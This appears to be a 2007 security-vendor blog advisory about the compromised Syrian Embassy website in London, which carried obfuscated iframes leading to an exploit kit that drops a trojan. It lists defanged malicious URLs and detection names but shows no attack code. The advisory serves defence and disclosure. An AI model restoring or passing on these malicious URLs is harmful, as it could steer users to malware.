Sep26
1:54 am (UTC-7)   |   by Jonell Baltazar (Advanced Threats Researcher)

This is to confirm a report from Websense about the compromised official website of Syrian Embassy located in London. Indeed, there are three obfuscated iframes found in the site.

The following is a sample obfuscated script found in the compromised page:

1.JPG

Deobfuscating the said scripts we get the following URLs:

  • hxxp://0ki.ru{blocked}/index.php
  • hxxp://sicil.info{blocked}/index.php
  • hxxp://x12345.or/{blocked}ounter.php?out=1189360677 (a zero-byte file)

Initial analysis of the first URL, it seems that it accepts country code as an argument, thus country checking is most probably employed. This is already detected as JS_PSYME.ANT. The second URL contains another iframe which leads to a URL containing the exploit kit (most probably Icepack). The exploit kit employs OS detection, web browser detection, and contains several exploits targeting web browsers and web browser plug-in. This will try to exploit several vulnerabilities to download and execute a file to be detected as TROJ_SMALL.KYZ. The exploit kit will be detected as JS_PSYME.ADQ.

2.JPG

3.bmp

The third URL just contains a zero-byte file.The malicious files are already being processed and the malicious URLs are submitted for blocking.

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!



This entry was posted on Wednesday, September 26th, 2007 at 1:54 am and is filed under Malicious Sites . Responses are closed, but you can trackback from your own site.



One Response to “Another Government Website Hacked”

Trackbacks

  1. Posibil HACK - verificati-va siteurile

STORM + Fools = $$$
Spammers still eyeing YouTube


 
TrendWatch Hijack This Web Protection Add-On
Free Online Virus Scan Rootkit Buster Submit Suspicious Files
Global Malware Map RUBotted? Trend Micro
 



    		 
© Copyright 2009 Trend Micro Inc. All rights reserved. Legal Notice